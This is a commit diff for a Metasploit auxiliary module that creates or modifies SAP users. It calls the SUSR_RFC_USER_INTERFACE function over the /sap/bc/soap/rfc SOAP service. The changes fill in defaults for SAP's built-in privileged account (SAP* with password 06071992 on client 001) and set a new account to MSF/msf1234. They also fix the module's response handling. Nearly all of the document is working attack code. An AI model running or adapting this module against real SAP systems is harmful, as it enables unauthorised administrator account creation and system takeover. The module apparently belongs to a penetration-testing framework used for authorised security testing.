module cleanup
parent
ea6c3e9b69
commit
5b55049610
|
@ -25,21 +25,30 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'SAP SOAP RFC SUSR_RFC_USER_INTERFACE',
|
'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module calls the RFC module (via SOAP) SUSR_RFC_USER_INTERFACE.
|
This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP
|
||||||
The module can be used for creating/modifying users.
|
/sap/bc/soap/rfc service, for creating/modifying users on a SAP.
|
||||||
},
|
},
|
||||||
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]],
|
'References' =>
|
||||||
'Author' => ['Agnivesh Sathasivam','nmonkee'],
|
[
|
||||||
'License' => BSD_LICENSE
|
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
|
||||||
|
],
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Agnivesh Sathasivam',
|
||||||
|
'nmonkee'
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
register_options([
|
register_options(
|
||||||
OptString.new('CLIENT', [true, 'SAP client', nil]),
|
[
|
||||||
OptString.new('USERNAME', [true, 'Username', nil]),
|
Opt::RPORT(8000),
|
||||||
OptString.new('PASSWORD', [true, 'Password', nil]),
|
OptString.new('CLIENT', [true, 'SAP client', '001']),
|
||||||
OptString.new('ABAP_PASSWORD',[false,'Password for the account (Default is 06071992)','06071992']),
|
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
|
||||||
OptString.new('ABAP_USER',[false,'Username for the account (Username in upper case only. Default is ADMIN)', 'ADMIN'])
|
OptString.new('PASSWORD', [true, 'Password', '06071992']),
|
||||||
|
OptString.new('ABAP_PASSWORD',[false,'Password for the account (Default is msf1234)','msf1234']),
|
||||||
|
OptString.new('ABAP_USER',[false,'Username for the account (Username in upper case only. Default is MSF)', 'MSF'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -73,20 +82,25 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
'Authorization' => 'Basic ' + user_pass,
|
'Authorization' => 'Basic ' + user_pass,
|
||||||
'Content-Type' => 'text/xml; charset=UTF-8'}
|
'Content-Type' => 'text/xml; charset=UTF-8'}
|
||||||
}, 45)
|
}, 45)
|
||||||
if res and res.code = 200
|
if res and res.code == 200
|
||||||
if res.body =~ /<h1>Logon failed<\/h1>/
|
if res.body =~ /<h1>Logon failed<\/h1>/
|
||||||
print_error("[SAP] #{ip}:#{rport} - Logon failed")
|
print_error("[SAP] #{ip}:#{rport} - Logon failed")
|
||||||
elsif res.body =~ /faultstring/
|
return
|
||||||
error = []
|
elsif res.body =~ /faultstring/
|
||||||
error = [ res.body.scan(%r{(.*?)})) ]
|
error = []
|
||||||
print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
|
error = [ res.body.scan(%r{(.*?)}) ]
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - #{error.join.chomp}")
|
||||||
|
return
|
||||||
|
else
|
||||||
|
print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
|
||||||
|
return
|
||||||
|
end
|
||||||
else
|
else
|
||||||
print_good("[SAP] #{ip}:#{rport} - User '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}' created")
|
print_error("[SAP] #{ip}:#{rport} - Unknown error")
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
|
||||||
|
print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
|
||||||
|
return
|
||||||
end
|
end
|
||||||
else
|
|
||||||
print_error("[SAP] #{ip}:#{rport} - Error code: " + res.code) if res
|
|
||||||
print_error("[SAP] #{ip}:#{rport} - Error message: " + res.message) if res
|
|
||||||
end
|
|
||||||
rescue ::Rex::ConnectionError
|
rescue ::Rex::ConnectionError
|
||||||
print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
|
print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
|
||||||
return
|
return
|
||||||
|
|
Loading…
Reference in New Issue